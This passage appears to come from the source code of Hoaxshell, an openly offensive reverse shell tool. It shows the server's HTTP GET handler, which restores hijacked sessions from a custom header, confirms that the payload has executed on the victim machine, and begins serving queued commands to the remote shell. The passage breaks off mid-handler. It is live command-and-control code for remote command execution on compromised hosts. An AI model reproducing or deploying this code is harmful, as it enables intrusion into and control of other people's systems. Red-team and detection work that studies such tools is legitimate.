| 427 | |
| 428 | |
| 429 | def do_GET(self): |
| 430 | |
| 431 | timestamp = int(datetime.now().timestamp()) |
| 432 | Hoaxshell.last_received = timestamp |
| 433 | |
| 434 | if args.grab and not Hoaxshell.restored: |
| 435 | if not args.Header: |
| 436 | header_id = [header.replace("X-", "") for header in self.headers.keys() if re.match("X-[a-z0-9]{4}-[a-z0-9]{4}", header)] |
| 437 | Hoaxshell.header_id = f'X-{header_id[0]}' |
| 438 | else: |
| 439 | Hoaxshell.header_id = args.Header |
| 440 | |
| 441 | session_id = self.headers.get(Hoaxshell.header_id) |
| 442 | |
| 443 | if len(session_id) == 26: |
| 444 | h = session_id.split('-') |
| 445 | Hoaxshell.verify = h[0] |
| 446 | Hoaxshell.get_cmd = h[1] |
| 447 | Hoaxshell.post_res = h[2] |
| 448 | Hoaxshell.SESSIONID = session_id |
| 449 | Hoaxshell.restored = True |
| 450 | Hoaxshell.execution_verified = True |
| 451 | session_check = Thread(target = checkPulse, args = (stop_event,)) |
| 452 | session_check.daemon = True |
| 453 | session_check.start() |
| 454 | |
| 455 | print(f'\r[{GREEN}Shell{END}] {BOLD}Session restored!{END}') |
| 456 | Hoaxshell.rst_promt_required = True |
| 457 | |
| 458 | self.server_version = Hoaxshell.server_version |
| 459 | self.sys_version = "" |
| 460 | session_id = self.headers.get(Hoaxshell.header_id) |
| 461 | legit = True if session_id == Hoaxshell.SESSIONID else False |
| 462 | |
| 463 | # Verify execution |
| 464 | if self.path == f'/{Hoaxshell.verify}' and legit: |
| 465 | |
| 466 | self.send_response(200) |
| 467 | self.send_header('Content-type', 'text/javascript; charset=UTF-8') |
| 468 | self.send_header('Access-Control-Allow-Origin', '*') |
| 469 | self.end_headers() |
| 470 | self.wfile.write(bytes('OK', "utf-8")) |
| 471 | Hoaxshell.execution_verified = True |
| 472 | session_check = Thread(target = checkPulse, args = (stop_event,)) |
| 473 | session_check.daemon = True |
| 474 | session_check.start() |
| 475 | print(f'\r[{GREEN}Shell{END}] {BOLD}Payload execution verified!{END}') |
| 476 | print(f'\r[{GREEN}Shell{END}] {BOLD}Stabilizing command prompt...{END}', end = '\n\n') #end = '' |
| 477 | print(f'\r[{IMPORTANT}] You can\'t change dir while utilizing --exec-outfile (-x) option. Your commands must include absolute paths to files, etc.') if args.exec_outfile else chill() |
| 478 | Hoaxshell.prompt_ready = False |
| 479 | Hoaxshell.command_pool.append(f"echo `r;pwd") |
| 480 | Hoaxshell.rst_promt_required = True |
| 481 | |
| 482 | |
| 483 | # Grab cmd |
| 484 | elif self.path == f'/{Hoaxshell.get_cmd}' and legit and Hoaxshell.execution_verified: |
| 485 | |
| 486 | self.send_response(200) |